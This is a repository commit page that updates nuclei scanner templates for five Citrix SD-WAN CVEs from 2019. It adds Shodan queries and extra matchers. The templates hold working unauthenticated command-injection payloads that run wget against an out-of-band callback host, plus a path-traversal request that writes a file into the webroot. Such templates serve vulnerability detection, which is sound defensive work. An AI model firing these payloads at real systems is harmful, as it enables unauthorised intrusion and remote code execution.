daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added additional matcher and shodan query

patch-1
Dhiyaneshwaran 2023-03-29 11:54:45 +05:30
parent 297bc113b9
commit cd647411ad
5 changed files with 68 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
cves/2019/CVE-2019-12985.yaml
View File

@ -14,10 +14,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12985
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /Collector/diagnostics/ping HTTP/1.1
Host: {{Hostname}}
@ -25,8 +31,14 @@ requests:
ipAddress=%60/bin/wget+http://{{interactsh-url}}%60
req-condition: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'

14
cves/2019/CVE-2019-12986.yaml
View File

@ -14,10 +14,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12986
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /Collector/diagnostics/trace_route HTTP/1.1
Host: {{Hostname}}
@ -25,8 +31,14 @@ requests:
ipAddress=%60/bin/wget+http://{{interactsh-url}}%60
req-condition: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'

16
cves/2019/CVE-2019-12987.yaml
View File

@ -14,18 +14,30 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12987
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |+
GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
unsafe: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'

14
cves/2019/CVE-2019-12988.yaml
View File

@ -14,18 +14,30 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12988
cwe-id: CWE-78
tags: cve,cve2019,citrix,rce,unauth
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth,oast
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |+
GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
unsafe: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: dsl
dsl:
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'

17
cves/2019/CVE-2019-12990.yaml
View File

@ -14,10 +14,16 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-12990
cwe-id: CWE-22
metadata:
shodan-query: http.title:"Citrix SD-WAN"
tags: cve,cve2019,citrix,rce,unauth
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1
Host: {{Hostname}}
@ -25,11 +31,16 @@ requests:
filename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=
- |
GET /talari/app/files/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
req-condition: true
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- 'contains(all_headers, "text/html")'
- 'status_code_3 == 200'
- 'contains(body_1, "<title>Citrix SD-WAN</title>")'
condition: and